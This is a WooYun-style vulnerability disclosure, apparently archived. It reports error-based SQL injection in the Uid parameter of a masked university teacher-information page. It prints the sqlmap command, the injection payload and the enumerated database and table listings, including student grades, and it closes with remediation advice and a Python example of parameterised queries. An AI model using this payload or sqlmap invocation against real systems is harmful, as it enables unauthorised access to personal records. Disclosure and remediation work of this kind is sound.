WooYun (WooYun.org) historical vulnerability lookup---http://wy.zone.ci/
WooYun Drops articles, online reader--------http://drop.zone.ci/
2016-03-16: Details have been sent to the vendor and are awaiting the vendor's handling
2016-03-18: The vendor has actively ignored the vulnerability; details are now disclosed to the public
As the title says.
target:
http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343
error:
payload:
$ python sqlmap.py -u "http://**.**.**.**/cmeip/teacherinfo/info.php?Uid=24343" --random-agent --dbms=mysql --technique=E
sqlmap:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: Uid (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: Uid=24343' AND (SELECT 6939 FROM(SELECT COUNT(*),CONCAT(0x71716b7a71,(SELECT (ELT(6939=6939,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'WdzW'='WdzW
---
[21:22:33] [INFO] testing MySQL
[21:22:33] [INFO] confirming MySQL
[21:22:33] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5
back-end DBMS: MySQL >= 5.0.0
databases:
available databases [14]:
[*] aacsb
[*] ccair
[*] cmeip
[*] cmeip_new
[*] com_ic
[*] cssm
[*] cssm_en
[*] cssm_en_new
[*] cssm_ip
[*] cssm_new
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
tables:
Database: cmeip_new
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| stu_grade          | 18170   |
| class_stu          | 3406    |
| history            | 1406    |
| others             | 1372    |
| core_ability_score | 1304    |
| `user`             | 1190    |
| userdata           | 1190    |
| prjournals         | 1140    |
| prproceedings      | 1105    |
| apmproceedings     | 1104    |
| international      | 480     |
| conference         | 326     |
| credit             | 263     |
| others1            | 209     |
| research           | 117     |
| textbooks          | 101     |
| edu                | 96      |
| exp                | 96      |
| books              | 90      |
| teacherdata        | 79      |
| functions          | 78      |
| mono               | 72      |
| photo              | 63      |
| class_teacher      | 43      |
| exam               | 33      |
| purview            | 27      |
| prpresentations    | 26      |
| patent             | 16      |
| chapters           | 11      |
| modules            | 11      |
| semester           | 11      |
| staffnum           | 11      |
| com_class          | 9       |
| core_ability       | 8       |
| announce           | 7       |
| core_ability_group | 4       |
| facworkshop        | 3       |
| nprjournals        | 3       |
| seminar            | 3       |
| soresearch         | 3       |
| `group`            | 1       |
| news               | 1       |
| online             | 1       |
+--------------------+---------+

Database: ccair
+------------------+---------+
| Table            | Entries |
+------------------+---------+
| sam_usertime     | 346     |
| sam_userjob      | 299     |
| sam_userlang     | 294     |
| sam_userexpr     | 244     |
| sam_syscode      | 226     |
| sam_sysuser      | 168     |
| sam_userplan     | 143     |
| sam_compjob      | 129     |
| sam_continfo     | 128     |
| sam_usercert     | 111     |
| sam_vw_summer01  | 111     |
| sam_vw_validjob  | 102     |
| tmp              | 101     |
| sam_userresu     | 98      |
| sam_userbiog     | 96      |
| sam_vw_applyinfo | 86      |
| sam_userinfo     | 80      |
| sam_sysgrant     | 68      |
| sam_vw_jobcnt    | 68      |
| sam_sysnum       | 63      |
| sam_compinfo     | 57      |
| sam_tracinfo     | 40      |
| sam_sysmenu      | 35      |
| sam_vw_compwait  | 8       |
| sam_sysparams    | 6       |
| sam_pracinfo     | 3       |
| sam_vw_pracjobs  | 3       |
+------------------+---------+

Database: cssm
+------------------------------+---------+
| Table                        | Entries |
+------------------------------+---------+
| grs_tw_stats                 | 1072494 |
| grs_eng_stats                | 197256  |
| grs_tw_keywords              | 36817   |
| grs_tw_admin_log             | 13436   |
| grs_eng_admin_log            | 2177    |
| grs_tw_album_gallery         | 1295    |
| grs_eng_keywords             | 785     |
| grs_tw_business_file         | 461     |
| grs_tw_business              | 343     |
| grs_tw_article               | 324     |
| grs_tw_periodical_file       | 176     |
| grs_tw_teaching              | 150     |
| grs_tw_periodical            | 84      |
| grs_eng_album_gallery        | 82      |
| grs_tw_law_file              | 82      |
| grs_tw_faculty               | 78      |
| grs_eng_faculty              | 77      |
| grs_tw_form                  | 71      |
| grs_eng_shop_config          | 67      |
| grs_tw_flash_play            | 67      |
| grs_tw_shop_config           | 67      |
| grs_eng_cssm_config          | 57      |
| grs_tw_cssm_config           | 57      |
| grs_eng_article              | 53      |
| grs_tw_album                 | 49      |
| grs_tw_law                   | 48      |
| grs_tw_friend_link           | 45      |
| grs_tw_communicate           | 40      |
| grs_tw_program               | 40      |
| grs_eng_flash_play           | 35      |
| grs_admin_action             | 33      |
| grs_tw_building              | 29      |
| grs_eng_program              | 28      |
| grs_tw_course                | 25      |
| grs_tw_member                | 24      |
| grs_eng_friend_link          | 21      |
| grs_eng_business_file        | 18      |
| grs_eng_member               | 15      |
| grs_tw_business_cat          | 14      |
| grs_eng_college              | 13      |
| grs_eng_business_cat         | 11      |
| grs_tw_college               | 11      |
| grs_tw_form_cat              | 9       |
| grs_eng_periodical_file      | 8       |
| grs_eng_program_cat          | 8       |
| grs_eng_teaching             | 8       |
| grs_eng_faculty_category     | 7       |
| grs_tw_article_cat           | 7       |
| grs_tw_faculty_category      | 7       |
| grs_tw_law_cat               | 7       |
| grs_eng_album                | 6       |
| grs_eng_album_category       | 6       |
| grs_tw_album_category        | 6       |
| grs_admin_user               | 5       |
| grs_eng_article_cat          | 5       |
| grs_eng_communicate          | 5       |
| grs_tw_building_cat          | 4       |
| grs_eng_communicate_category | 3       |
| grs_eng_link_category        | 3       |
| grs_tw_communicate_category  | 3       |
| grs_tw_link_category         | 3       |
| grs_tw_program_cat           | 3       |
| grs_eng_course_category      | 2       |
| grs_eng_member_category      | 2       |
| grs_eng_periodical           | 2       |
| grs_eng_teaching_cat         | 2       |
| grs_tw_course_category       | 2       |
| grs_tw_member_category       | 2       |
| grs_tw_teaching_cat          | 2       |
| grs_eng_building             | 1       |
| grs_eng_course               | 1       |
| grs_eng_form                 | 1       |
+------------------------------+---------+

Database: aacsb
+-------------------+---------+
| Table             | Entries |
+-------------------+---------+
| sam_coursescor    | 16085   |
| sam_courselist    | 6727    |
| sam_courseatte    | 1134    |
| sam_vw_coursescor | 208     |
| sam_coursegoal    | 200     |
| sam_courseinfo    | 162     |
| sam_goalrank      | 156     |
| sam_sysnum        | 111     |
| sam_degreegoal    | 83      |
| sam_sysuser       | 68      |
| sam_sysgrant      | 39      |
| sam_syscode       | 28      |
| sam_sysmenu       | 28      |
| sam_scoreclass    | 17      |
| sam_rankscore     | 10      |
| sam_sysparams     | 6       |
| sam_terminfo      | 5       |
| sam_sysnews       | 2       |
| sam_sysnewslist   | 2       |
+-------------------+---------+
The data sqlmap extracted above is enough to confirm the SQL injection vulnerability; it exposes the names and row counts of the related databases and tables, and the same injection point can be used to dump their contents...
Filter the relevant parameter: Uid is a numeric identifier, so reject anything that is not a plain integer, and pass it to the query as a bound parameter instead of concatenating it into the SQL string.
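To make both halves of this report concrete, here is an added Python example; it is not part of the original report. It decodes the two hex markers from the sqlmap payload above and shows how the value leaked through a MySQL duplicate-key error is read back out from between them, then contrasts the string-concatenated lookup that makes Uid injectable with the validated, parameterised version the fix asks for. The teacherinfo table, its rows and the MySQL error text are constructed for the example (the real schema and server messages are not on the page), and SQLite stands in for MySQL only for the query-building part: the FLOOR(RAND(0)*2) GROUP BY duplicate-key trick is MySQL-specific and is not reproduced here.

```python
import re
import sqlite3
from typing import List, Optional

# The two hex string literals from the sqlmap payload above. sqlmap wraps the
# value it wants to read in these random markers so it can locate it inside
# whatever error text the server echoes back.
PREFIX_HEX = "0x71716b7a71"
SUFFIX_HEX = "0x716b626a71"


def decode_hex_literal(literal: str) -> str:
    """Decode a MySQL 0x... string literal into the text it represents."""
    return bytes.fromhex(literal[2:]).decode("ascii")


def extract_leaked_value(error_text: str, prefix: str, suffix: str) -> Optional[str]:
    """Pull the marker-bounded value out of an echoed database error.

    MySQL's FLOOR(RAND(0)*2) ... GROUP BY trick makes the server fail with
    'Duplicate entry ... for key ...', where the entry is the CONCAT() result,
    so whatever was selected in place of ELT(6939=6939,1) sits between the
    two markers.
    """
    match = re.search(re.escape(prefix) + r"(.*?)" + re.escape(suffix), error_text)
    return match.group(1) if match else None


# Constructed stand-in for the error MySQL would raise for the page's payload;
# the trailing '1' after the suffix marker is the FLOOR(RAND(0)*2) term.
CONSTRUCTED_MYSQL_ERROR = "Duplicate entry 'qqkzq1qkbjq1' for key 'group_key'"


def build_db() -> sqlite3.Connection:
    """Constructed teacherinfo table; the real schema is not on the page."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE teacherinfo (Uid INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany(
        "INSERT INTO teacherinfo VALUES (?, ?)",
        [(24343, "teacher A"), (24344, "teacher B")],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, uid: str) -> List[str]:
    """The pattern behind the finding: the raw Uid value is spliced into SQL."""
    sql = "SELECT name FROM teacherinfo WHERE Uid='%s'" % uid
    return [row[0] for row in conn.execute(sql)]


def is_valid_uid(uid: str) -> bool:
    """Uid is a numeric identifier, so only a plain run of digits is acceptable."""
    return re.fullmatch(r"[0-9]{1,10}", uid) is not None


def lookup_fixed(conn: sqlite3.Connection, uid: str) -> List[str]:
    """Validate the parameter, then bind it; the value never becomes SQL text."""
    if not is_valid_uid(uid):
        raise ValueError("Uid must be a positive integer")
    rows = conn.execute("SELECT name FROM teacherinfo WHERE Uid=?", (int(uid),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    prefix, suffix = decode_hex_literal(PREFIX_HEX), decode_hex_literal(SUFFIX_HEX)
    print("markers:", prefix, suffix)
    print("leaked value:", extract_leaked_value(CONSTRUCTED_MYSQL_ERROR, prefix, suffix))
    db = build_db()
    tautology = "24343' OR '1'='1"
    print("vulnerable lookup with tautology:", lookup_vulnerable(db, tautology))
    print("fixed lookup with a real id:", lookup_fixed(db, "24343"))
    try:
        lookup_fixed(db, tautology)
    except ValueError as exc:
        print("fixed lookup rejects the payload:", exc)
```

The tautology used for the concatenated lookup is the simplest possible breakout; sqlmap's actual payload does the same breakout with the quote after 24343 and then closes the statement with AND 'WdzW'='WdzW'. Binding the parameter removes the breakout entirely, and the digits-only check on top of it keeps garbage out of the logs and gives the endpoint a clean 400 path.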
Severity: no impact, ignored by vendor
Ignored at: 2016-03-18 03:33
At verification time the reported page already returned 404.
None yet.